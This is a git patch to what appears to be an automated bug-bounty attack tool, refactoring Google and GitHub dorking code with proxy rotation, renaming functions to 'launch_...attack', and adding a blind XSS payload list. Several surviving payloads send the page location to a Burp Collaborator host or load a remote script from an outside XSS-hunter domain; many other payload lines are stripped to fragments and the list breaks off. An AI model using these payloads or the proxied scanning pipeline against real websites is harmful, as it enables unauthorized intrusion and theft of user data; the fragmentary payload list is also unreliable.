From 8da788faf994afc123dd18025f1bcc68881691db Mon Sep 17 00:00:00 2001 From: ElNiak Date: Thu, 20 Jun 2024 07:48:40 +0200 Subject: [PATCH] add documentation adn change result (todo) --- bounty_drive/attacks/dorks/dorking_config.py | 6 - bounty_drive/attacks/dorks/github_config.py | 11 - bounty_drive/attacks/dorks/github_dorking.py | 11 +- bounty_drive/attacks/dorks/google_dorking.py | 280 +- bounty_drive/attacks/sqli/sqli.py | 2 +- .../xss/payloads/blind-xss-payload-list.txt | 27 + .../xss/payloads/dom-xss-payload-list.txt | 6613 +++++++++++++++++ bounty_drive/attacks/xss/xss.py | 447 +- bounty_drive/attacks/xss/xss_cve.py | 66 + bounty_drive/attacks/xss/xss_striker.py | 220 +- bounty_drive/bounty_drive.py | 93 +- bounty_drive/bypasser/waf_mitigation.py | 16 +- bounty_drive/configs/config.ini | 21 +- bounty_drive/reporting/results_manager.py | 30 +- bounty_drive/requester/request_manager.py | 43 + bounty_drive/vpn_proxies/proxies_manager.py | 50 + bounty_drive/vpn_proxies/vpn_manager.py | 8 + 17 files changed, 7554 insertions(+), 390 deletions(-) delete mode 100644 bounty_drive/attacks/dorks/dorking_config.py delete mode 100644 bounty_drive/attacks/dorks/github_config.py create mode 100644 bounty_drive/attacks/xss/payloads/blind-xss-payload-list.txt create mode 100644 bounty_drive/attacks/xss/payloads/dom-xss-payload-list.txt diff --git a/bounty_drive/attacks/dorks/dorking_config.py b/bounty_drive/attacks/dorks/dorking_config.py deleted file mode 100644 index 310611d..0000000 --- a/bounty_drive/attacks/dorks/dorking_config.py +++ /dev/null @@ -1,6 +0,0 @@ -class DorkingConfig: - SUBDOMAIN = [] # TODO use target.txt and allow multiple domain - CRAWL = False - - -dorking_config = DorkingConfig() diff --git a/bounty_drive/attacks/dorks/github_config.py b/bounty_drive/attacks/dorks/github_config.py deleted file mode 100644 index 6147dc0..0000000 --- a/bounty_drive/attacks/dorks/github_config.py +++ /dev/null @@ -1,11 +0,0 @@ -######################################################################################### -# Global variables -######################################################################################### - -# GitHub Dorking -GITHUB_API_URL = "https://api.github.com" -TOKENS_LIST = ["your_github_token"] # Add your GitHub tokens here -DORK_LIST = ["example_dork1", "example_dork2"] # Add your dorks here -QUERIES_LIST = ["example_query"] # Add your queries here -ORGANIZATIONS_LIST = ["example_organization"] # Add your organizations here -USERS_LIST = ["example_user"] # Add your users here diff --git a/bounty_drive/attacks/dorks/github_dorking.py b/bounty_drive/attacks/dorks/github_dorking.py index 3bae243..0436165 100644 --- a/bounty_drive/attacks/dorks/github_dorking.py +++ b/bounty_drive/attacks/dorks/github_dorking.py @@ -11,11 +11,18 @@ import requests from termcolor import cprint -from attacks.dorks.github_config import GITHUB_API_URL, TOKENS_LIST from utils.app_config import * token_index = 0 +# GitHub Dorking +GITHUB_API_URL = "https://api.github.com" +TOKENS_LIST = ["your_github_token"] # Add your GitHub tokens here +DORK_LIST = ["example_dork1", "example_dork2"] # Add your dorks here +QUERIES_LIST = ["example_query"] # Add your queries here +ORGANIZATIONS_LIST = ["example_organization"] # Add your organizations here +USERS_LIST = ["example_user"] # Add your users here + def token_round_robin(): global token_index @@ -105,5 +112,5 @@ def github_search_with_proxy(dork_tuple, proxy, category, retries=3, advanced=Fa return category, None # Indicate failure after retries -# def load_github_dorks_and_search(extension=DEFAULT_EXTENSION, total_output=DEFAULT_TOTAL_OUTPUT, page_no=DEFAULT_PAGE_NO, proxies=None): +# def launch_github_dorks_and_search_attack(extension=DEFAULT_EXTENSION, total_output=DEFAULT_TOTAL_OUTPUT, page_no=DEFAULT_PAGE_NO, proxies=None): # pass diff --git a/bounty_drive/attacks/dorks/google_dorking.py b/bounty_drive/attacks/dorks/google_dorking.py index 1d33cc8..47d1b59 100644 --- a/bounty_drive/attacks/dorks/google_dorking.py +++ b/bounty_drive/attacks/dorks/google_dorking.py @@ -19,9 +19,13 @@ from scraping.web_scraper import parse_google_search_results, render_js_and_get_text -from vpn_proxies.proxies_manager import prepare_proxies, round_robin_proxies +from vpn_proxies.proxies_manager import get_proxies_and_cycle, prepare_proxies from requester.request_manager import param_converter, start_request -from reporting.results_manager import get_processed_dorks, safe_add_result +from reporting.results_manager import ( + get_processed_dorks, + save_dorking_query, + google_dorking_results, +) dork_id_lock = threading.Lock() @@ -37,6 +41,29 @@ def google_search_with_proxy( advanced=False, dork_id=0, ): + """Performs a Google search using a proxy. + + This function takes in various parameters to perform a Google search using a proxy. + It generates a full query based on the provided dork query, config, and domain. + It prepares the necessary parameters and proxies, and then performs the search using the `perform_searches` function. + + Args: + dork_query (str): The dork query to be used for the Google search. + proxy (str): The proxy to be used for the Google search. + category (str): The category of the search. + config (dict): The configuration file. + domain (str): The domain to be searched. + processed_dorks (list): A list of processed dorks. + retries (int, optional): The number of retries for the search. Defaults to 1. + advanced (bool, optional): Whether to use advanced search options. Defaults to False. + dork_id (int, optional): The ID of the dork. Defaults to 0. + + Raises: + Exception: If the config file is not provided. + + Returns: + dict: The search results. + """ if not config: raise Exception("Config file should be provided") @@ -82,6 +109,26 @@ def perform_searches( processed_dorks, use_session, ): + """Perform searches using Google dorking. + + This function performs searches using Google dorking technique. It takes various parameters + to customize the search query and behavior. + + Args: + full_query (str): The full search query. + proxies (dict): A dictionary of proxies to be used for the search. + category (str): The category of the search. + params (dict): Additional parameters for the search. + retries (int): The number of retries in case of failure. + config (dict): Configuration settings for the search. + advanced (bool): Flag indicating whether to use advanced search techniques. + dork_id (int): The ID of the dork. + processed_dorks (list): A list of processed dorks. + use_session (bool): Flag indicating whether to use session for the search. + + Returns: + int: The ID of the executed search. + """ params["q"] = full_query dork_id = execute_search_with_retries( @@ -112,6 +159,24 @@ def execute_search_with_retries( processed_dorks, use_session=False, ): + """ + Execute a search with retries using Google dorking. + + Args: + query (str): The search query. + proxies (dict): The proxies to be used for the request. + category (str): The category of the search. + params (dict): The parameters for the request. + retries (int): The number of retries. + config (dict): The configuration settings. + advanced (bool): Whether to use advanced search techniques. + dork_id (int): The ID of the dork. + processed_dorks (list): The list of already processed dorks. + use_session (bool, optional): Whether to use a session for the request. Defaults to False. + + Returns: + int: The updated dork ID. + """ base_url = "https://www.google.com/search" headers = { "User-Agent": random.choice(USER_AGENTS), @@ -207,7 +272,9 @@ def execute_search_with_retries( proxies, advanced, query, html_content ) result = dork_id, category, urls, query - safe_add_result(result, config) + # save_dorking_query(result, config) + with dork_id_lock: + google_dorking_results.append((result, config)) # with dork_id_lock: # dork_id += 1 # TODO to be faster also record non functionnal dork @@ -250,6 +317,23 @@ def execute_search_with_retries( def generate_dork_query(query, config, domain): + """Generate a dork query for Google dorking. + + This function takes a query, configuration, and domain as input and generates a dork query + for Google dorking. It cleans up the query by removing existing inurl: and intext: tags, + ensures the query is properly enclosed in quotes if it contains quotes, and incorporates + the subdomain into the search query if specified. It also appends the file extension to the + query if specified in the configuration. + + Args: + query (str): The query string. + config (dict): The configuration settings. + domain (str): The domain to incorporate into the search query. + + Returns: + str: The generated dork query. + + """ # Clean up the query by removing existing inurl: and intext: tags if len(query) > 0: for tag in ["inurl:", "intext:"]: @@ -291,6 +375,14 @@ def generate_dork_query(query, config, domain): def filter_search_tasks(search_tasks, processed_dorks): """ Filters out the already processed dorks from search tasks. + + Args: + search_tasks (dict): A dictionary containing search tasks categorized by their respective categories. + processed_dorks (list): A list of already processed dorks. + + Returns: + dict: A dictionary containing filtered search tasks with the already processed dorks removed. + """ filtered_tasks = {} for category, dorks in search_tasks.items(): @@ -300,97 +392,113 @@ def filter_search_tasks(search_tasks, processed_dorks): return filtered_tasks -def load_google_dorks_and_search(config, categories): - proxies, proxy_cycle = get_proxies_and_cycle(config) +def launch_google_dorks_and_search_attack(config, categories): + """Launches a Google dorks and search attack. - search_tasks = {} + This function takes a configuration object and a list of categories as input. + It performs a Google dorks search for each category and launches a search attack + using the obtained dorks. - for category in categories: - search_tasks[category] = [] - dork_files = glob.glob(f"attacks/dorks/google/{category}/*.txt", recursive=True) - for dork_file in dork_files: - with open(dork_file, "r") as file: - lines = file.readlines() - dorks = [line.strip() for line in lines] - search_tasks[category] += dorks + Args: + config (dict): A configuration object containing various settings for the attack. + categories (list): A list of categories to perform the search attack on. - cprint( - f"Total number of dorks: {sum([len(search_tasks[task]) for task in search_tasks])}", - "yellow", - file=sys.stderr, - ) - processed_dorks = get_processed_dorks(config) + Raises: + NotImplementedError: If VPN is enabled in the configuration, as VPN is not supported in this version. + Exception: If any other error occurs during the search attack. - if not search_tasks: - cprint(f"No dorks to process.", "red", file=sys.stderr) - return + Returns: + None + """ + try: + proxies, proxy_cycle = get_proxies_and_cycle(config) - if config["use_vpn"]: - raise NotImplementedError( - "VPN is not supported in this version - Error in library" - ) - thread = threading.Thread(target=change_vpn) - thread.start() - - number_of_worker = min(len(proxies), 30) - cprint(f"Number of workers: {number_of_worker}", "yellow", file=sys.stderr) - - search_tasks_with_proxy = [] - for task in search_tasks: - for domain in config["subdomain"]: - for dork in search_tasks[task]: - proxy = next(proxy_cycle) - search_tasks_with_proxy.append( - {"dork": dork, "proxy": proxy, "category": task, "domain": domain} - ) - cprint( - f"Total number of dorks: {len(search_tasks_with_proxy)}", - "yellow", - file=sys.stderr, - ) + search_tasks = {} + + for category in categories: + search_tasks[category] = [] + dork_files = glob.glob( + f"attacks/dorks/google/{category}/*.txt", recursive=True + ) + for dork_file in dork_files: + with open(dork_file, "r") as file: + lines = file.readlines() + dorks = [line.strip() for line in lines] + search_tasks[category] += dorks - with concurrent.futures.ThreadPoolExecutor( - max_workers=number_of_worker - ) as executor: - future_to_search = { - executor.submit( - google_search_with_proxy, - task["dork"], - task["proxy"], - task["category"], - config, - task["domain"], - processed_dorks, - ): task - for task in search_tasks_with_proxy - } - for future in tqdm( - concurrent.futures.as_completed(future_to_search), - total=len(future_to_search), - desc="Searching for vulnerable website", - unit="site", - ): - # task = future_to_search[future] - # try: - future.result() - - -def get_proxies_and_cycle(config): - proxies = config["proxies"] - if config["use_proxy"] and len(proxies) == 0: cprint( - f"Using proxies -> you should have at least one UP", - "red", + f"Total number of dorks: {sum([len(search_tasks[task]) for task in search_tasks])}", + "yellow", file=sys.stderr, ) - exit() + processed_dorks = get_processed_dorks(config) - if not config["use_proxy"]: - proxies = [None] + if not search_tasks: + cprint(f"No dorks to process.", "red", file=sys.stderr) + return + + if config["use_vpn"]: + raise NotImplementedError( + "VPN is not supported in this version - Error in library" + ) + thread = threading.Thread(target=change_vpn) + thread.start() + + number_of_worker = min(len(proxies), 30) + cprint(f"Number of workers: {number_of_worker}", "yellow", file=sys.stderr) + + search_tasks_with_proxy = [] + for task in search_tasks: + for domain in config["subdomain"]: + for dork in search_tasks[task]: + proxy = next(proxy_cycle) + search_tasks_with_proxy.append( + { + "dork": dork, + "proxy": proxy, + "category": task, + "domain": domain, + } + ) + cprint( + f"Total number of dorks: {len(search_tasks_with_proxy)}", + "yellow", + file=sys.stderr, + ) - proxy_cycle = round_robin_proxies(proxies) - return proxies, proxy_cycle - # update_csv(config["experiment_file_path"], task, success=True) - # except Exception as e: - # cprint(f"Error processing {task['dork']}: {e}", "red", file=sys.stderr) - # # update_csv(config["experiment_file_path"], task, success=False) + with concurrent.futures.ThreadPoolExecutor( + max_workers=number_of_worker + ) as executor: + future_to_search = { + executor.submit( + google_search_with_proxy, + task["dork"], + task["proxy"], + task["category"], + config, + task["domain"], + processed_dorks, + ): task + for task in search_tasks_with_proxy + } + for future in tqdm( + concurrent.futures.as_completed(future_to_search), + total=len(future_to_search), + desc="Searching for vulnerable website", + unit="site", + ): + future.result() + except KeyboardInterrupt: + cprint( + "Process interrupted by user during google dorking phase ... Saving results", + "red", + file=sys.stderr, + ) + concurrent.futures.thread._threads_queues.clear() + # https://stackoverflow.com/questions/49992329/the-workers-in-threadpoolexecutor-is-not-really-daemon + for result, config in google_dorking_results: + save_dorking_query(result, config) + quit() + except Exception as e: + cprint(f"Error searching for dorks: {e}", "red", file=sys.stderr) + raise e diff --git a/bounty_drive/attacks/sqli/sqli.py b/bounty_drive/attacks/sqli/sqli.py index cba89de..9ebb3f3 100644 --- a/bounty_drive/attacks/sqli/sqli.py +++ b/bounty_drive/attacks/sqli/sqli.py @@ -96,7 +96,7 @@ def test_sqli_with_proxy(url_proxy): return url, vuln # Error or can't determine -def test_vulnerability_sqli(proxies): +def launch_sqli_attack(proxies): """ Test a list of websites for SQL injection vulnerability using multithreading and proxies. """ diff --git a/bounty_drive/attacks/xss/payloads/blind-xss-payload-list.txt b/bounty_drive/attacks/xss/payloads/blind-xss-payload-list.txt new file mode 100644 index 0000000..109fc38 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/blind-xss-payload-list.txt @@ -0,0 +1,27 @@ +'"> +'"> +'"> +'"> +'"> +'"> +'"> +'"> +'"> +'"> + +'"> +'"> +'"> +'"> +javascript:window.location="https://example.burpcollaborator.net/js-scheme?"+btoa(document.location) +javascript:fetch("https://example.burpcollaborator.net/js-scheme-fetch?"+btoa(document.location)) + +'> +"> +javascript:eval('var a=document.createElement(\'script\');a.src=\'https://crimson.xss.ht\';document.body.appendChild(a)') +"> +"> +">